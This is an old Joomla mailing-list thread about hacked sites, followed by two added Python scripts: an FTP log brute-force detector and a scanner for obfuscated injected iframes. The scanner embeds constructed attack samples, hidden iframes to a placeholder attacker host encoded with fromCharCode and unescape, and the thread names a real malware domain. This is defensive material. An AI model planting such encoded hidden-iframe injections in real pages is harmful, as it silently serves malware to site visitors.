We found the attacks/IP in the server logs. A financially backed hacker outfit from Nigeria, go figure. The joys of having a PR9 site =P
Our password was 10 chars including letters, numbers and punctuation. We are hosted on a "secured" rackspace server. We don't have FTP running any more!

Barrie North
~Fully Managed Joomla Sites~
www.simplweb.com/joomla
~Join the Community at compassdesigns.net~
www.compassdesigns.net/join-the-community.html

On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirja...@gmail.com> wrote:
> Hello Barrie,
>
> May I inquire as to how you verified the attack? I know that FTP bruteforcing is extremely difficult, and that is very improbable. What you may have faced was a dictionary attack, which may have worked with some luck if you had a weak password. A password including a mix of
>
> 1) UPPERCASE
> 2) lowercase
> 3) punctuation/!#$.,
> 4) numbers
>
> and have a good strong/long password and you would never fall victim to dictionary.
>
> As for bruteforce, an ftpd simply denies access after 3 or 5 (configurable, usually defaults to 3) failed login attempts for some time. Some hosts go as far as restricting ftp access until you call them and verify the problem. Also, brute forcing over a TCP pipe a slow protocol such as FTP is virtually impossible. At this rate it would take YEARS to bruteforce the password if not DECADES.
>
> @ Other users
> Also make sure to go into joomla user configuration and change the username of 'admin' to something else.
> To protect your joomla administration section, if you have a static ip, you can add
>
> order allow,deny
> deny from all
> allow from your.static.ip.here
>
> to a file called .htaccess in your administration folder. If for some reason your ip changes and you get locked out, simply login via FTP and update the .htaccess file. There are some other advanced methods for protecting your administration folder.
>
> Also, FTP was a protocol developed 30+ years ago. It is not secure, clear text authentication, etc. FTP must go. If you can help it, do not use ftp, instead SFTP, or SSH. Just... anything but FTP. Sadly, that's all that is easy to use, highly available across all hosts, and not everyone on shared hosting provides SSH access. If you can do without it, do without it. http://wooledge.org/mywiki/FtpMustDie
>
> I have seen more sites hacked due to unpatched php or bad php code (mostly from 3rd party addons) more than I have with FTP though.
>
> Still with good security practices you can reduce the risk considerably.
>
> Peace.
>
> 2009/3/26 Barrie North <bar...@compassdesigns.net>:
> > We got hacked last month by a brute force attack on our FTP password. Once they had that, they got into the Joomla files.
> >
> > Any site can be hacked. The other half of the equation is vigilance and backups :)
> >
> > Barrie North
> > ~Fully Managed Joomla Sites~
> > www.simplweb.com/joomla
> > ~Join the Community at compassdesigns.net~
> > www.compassdesigns.net/join-the-community.html
> >
> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masi...@verizon.net> wrote:
> >> Several of my clients' 1.0.15 sites have been hacked this week! Is there a problem with 1.0?
> >>
> >> I don't see an announcement on joomla.org
> >>
> >> I just saw that my site was hacked the other day. Fortunately they bunged it up a bit, so the code didn't run, but instead gave an error message.
> >>
> >> What they had done is append javascript to the index.php file. It was disguised as ascii codes, and there were several var defined and substituted in, but the result was that it attempted to open a hidden iframe directed to siplank.com. When I tried to open siplank.com in a web browser (yes, I did that! I do lots of crazy things out of curiosity) Firefox stopped it with a warning about the site being known for malware.
> >>
> >> I'm running 1.5.9 on a shared host. I will be calling my host and asking them what they can find out from their logs as to what happened.
> >>
> >> _______________________________________________
> >> New York PHP SIG: Joomla! Mailing List
> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >>
> >> NYPHPCon 2006 Presentations Online
> >> http://www.nyphpcon.com
> >>
> >> Show Your Participation in New York PHP
> >> http://www.nyphp.org/show_participation.php
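The thread turns on two points: Atir's claim that an ftpd locks a client out after a handful of failures, and Barrie's statement that the attacking IP was found in the server logs. The script below is an added example, not code from the thread or from any of the posters' hosts, of the check a host would run over an FTP log after such a report: it counts failed logins per client IP inside a sliding time window, records which usernames were tried, and flags the case that matters for incident response, a successful login from the same IP after a run of failures. It assumes vsftpd's log line format (the thread does not say which ftpd was in use); the log lines are constructed and the addresses are documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in vsftpd's log line format (assumption: the thread does
# not say which ftpd was in use). IPs are from documentation ranges.
SAMPLE_LOG = """\
Thu Mar 26 19:00:01 2009 [pid 4011] [admin] FAIL LOGIN: Client "203.0.113.45"
Thu Mar 26 19:00:02 2009 [pid 4012] [admin] FAIL LOGIN: Client "203.0.113.45"
Thu Mar 26 19:00:03 2009 [pid 4013] [admin] FAIL LOGIN: Client "203.0.113.45"
Thu Mar 26 19:00:04 2009 [pid 4014] [administrator] FAIL LOGIN: Client "203.0.113.45"
Thu Mar 26 19:00:05 2009 [pid 4015] [webmaster] FAIL LOGIN: Client "203.0.113.45"
Thu Mar 26 19:00:07 2009 [pid 4016] [admin] OK LOGIN: Client "203.0.113.45"
Thu Mar 26 19:05:00 2009 [pid 4020] [barrie] FAIL LOGIN: Client "198.51.100.7"
Thu Mar 26 19:06:00 2009 [pid 4021] [barrie] OK LOGIN: Client "198.51.100.7"
Thu Mar 26 23:00:00 2009 [pid 4030] [admin] FAIL LOGIN: Client "192.0.2.9"
"""

# vsftpd writes: <date> [pid N] [user] OK|FAIL LOGIN: Client "ip"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_line(line):
    """Parse one vsftpd login line; return None for lines of other kinds."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y"),
        "user": m.group("user"),
        "ok": m.group("result") == "OK",
        "ip": m.group("ip"),
    }


def find_bruteforce(log_text, threshold=3, window=timedelta(minutes=10)):
    """Return {ip: report} for every client that produced at least `threshold`
    failed logins within any `window`. The report also records whether that
    client later logged in successfully, which is the signal to treat the
    account as compromised rather than merely probed."""
    def fresh():
        return {"failures": 0, "users": set(), "flagged": False,
                "success_after_failures": False, "compromised_user": None,
                "_recent": deque()}          # timestamps of failures in window

    state = defaultdict(fresh)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        s = state[ev["ip"]]
        if ev["ok"]:
            if s["flagged"]:                  # success right after a burst of failures
                s["success_after_failures"] = True
                s["compromised_user"] = ev["user"]
            continue
        s["failures"] += 1
        s["users"].add(ev["user"])
        s["_recent"].append(ev["ts"])
        while ev["ts"] - s["_recent"][0] > window:   # drop failures outside window
            s["_recent"].popleft()
        if len(s["_recent"]) >= threshold:
            s["flagged"] = True
    return {ip: {k: v for k, v in s.items() if not k.startswith("_")}
            for ip, s in state.items() if s["flagged"]}


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, report in find_bruteforce(text).items():
        print(ip, report)
```

Run with no arguments it scans the constructed sample and reports only 203.0.113.45: five failures across three usernames, followed by a successful login as admin. The single failures from the other two addresses stay below the threshold, which is what a daemon's own lockout would also ignore.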
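The injection Mark describes, JavaScript appended to index.php, encoded as character codes, assembled from several variables and writing a hidden iframe, can be found without opening the page in a browser by decoding the encoding layers and then looking for the iframe. The script below is an added example, not code from the thread or from Joomla: it peels off String.fromCharCode(...) and unescape('...') literals and joins simple "a"+"b" string concatenations, then reports every iframe it can read, the host it points at, and whether the tag is styled to be invisible. The sample files are constructed and the host attacker.example is a placeholder standing in for the real one.

```python
import re
from urllib.parse import quote, unquote

# --- constructed samples (not files from the thread) -----------------------
CLEAN_INDEX_PHP = (
    "<?php\n"
    "// constructed stand-in for a site's index.php\n"
    "define('_JEXEC', 1);\n"
    "echo 'hello';\n"
    "?>\n"
)
# attacker.example is a placeholder; the incident's real host is not reproduced.
_PAYLOAD_A = ('<iframe src="http://attacker.example/x.php" width=0 height=0 '
              'style="visibility:hidden"></iframe>')
_PAYLOAD_B = '<iframe src="//attacker.example/y.php" style="display:none"></iframe>'

# Variant 1: the iframe hidden as a list of character codes
INJECTED_FROMCHARCODE = CLEAN_INDEX_PHP + (
    "<script>var s=String.fromCharCode(%s);document.write(s);</script>\n"
    % ",".join(str(ord(c)) for c in _PAYLOAD_A)
)
# Variant 2: percent-encoded and split over two string literals joined with +
_enc = quote(_PAYLOAD_B, safe="")
_half = len(_enc) // 2
INJECTED_UNESCAPE = CLEAN_INDEX_PHP + (
    "<script>document.write(unescape('%s' + '%s'));</script>\n"
    % (_enc[:_half], _enc[_half:])
)

# --- decoding of the common encoding layers --------------------------------
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
_UNESCAPE = re.compile(r"unescape\(\s*(['\"])([^'\"]*)\1\s*\)")
_CONCAT_DQ = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
_CONCAT_SQ = re.compile(r"'([^'\\]*)'\s*\+\s*'([^'\\]*)'")


def decode_obfuscation(text, max_rounds=10):
    """Replace fromCharCode/unescape literals and "a"+"b" joins with the text
    they produce, repeating until nothing changes so nested layers are peeled."""
    for _ in range(max_rounds):
        new = _CONCAT_DQ.sub(r'"\1\2"', text)
        new = _CONCAT_SQ.sub(r"'\1\2'", new)
        new = _FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n))
                              for n in re.split(r"[\s,]+", m.group(1).strip()) if n),
            new)
        new = _UNESCAPE.sub(lambda m: unquote(m.group(2)), new)
        if new == text:
            break
        text = new
    return text


# --- the check itself ------------------------------------------------------
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
_SRC_HOST = re.compile(r"""src\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
_HIDDEN = re.compile(
    r"""(?:width|height)\s*=\s*["']?\s*0\b|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE)


def scan_for_injected_iframe(php_source):
    """Return one finding per iframe present after decoding: its target host,
    whether it is styled invisible, and whether it was hidden by encoding."""
    decoded = decode_obfuscation(php_source)
    findings = []
    for m in _IFRAME.finditer(decoded):
        tag = m.group(0)
        host = _SRC_HOST.search(tag)
        findings.append({
            "host": host.group(1) if host else None,
            "hidden": bool(_HIDDEN.search(tag)),
            "obfuscated": tag not in php_source,   # only visible after decoding
        })
    return findings


def scan_file(path):
    """Scan one file on disk (errors='replace' so binary junk cannot abort the run)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_for_injected_iframe(fh.read())


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, scan_file(p))
    else:
        for name, src in [("clean", CLEAN_INDEX_PHP),
                          ("fromCharCode", INJECTED_FROMCHARCODE),
                          ("unescape", INJECTED_UNESCAPE)]:
            print(name, scan_for_injected_iframe(src))
```

Both constructed variants decode to an iframe that is styled invisible and points at the placeholder host, and the clean stub yields nothing. An iframe that is present in plain text and not hidden is reported with `obfuscated` and `hidden` both false, so a legitimate embed is distinguishable from an injected one; in a real cleanup the decisive comparison is still against a clean copy of the same Joomla release.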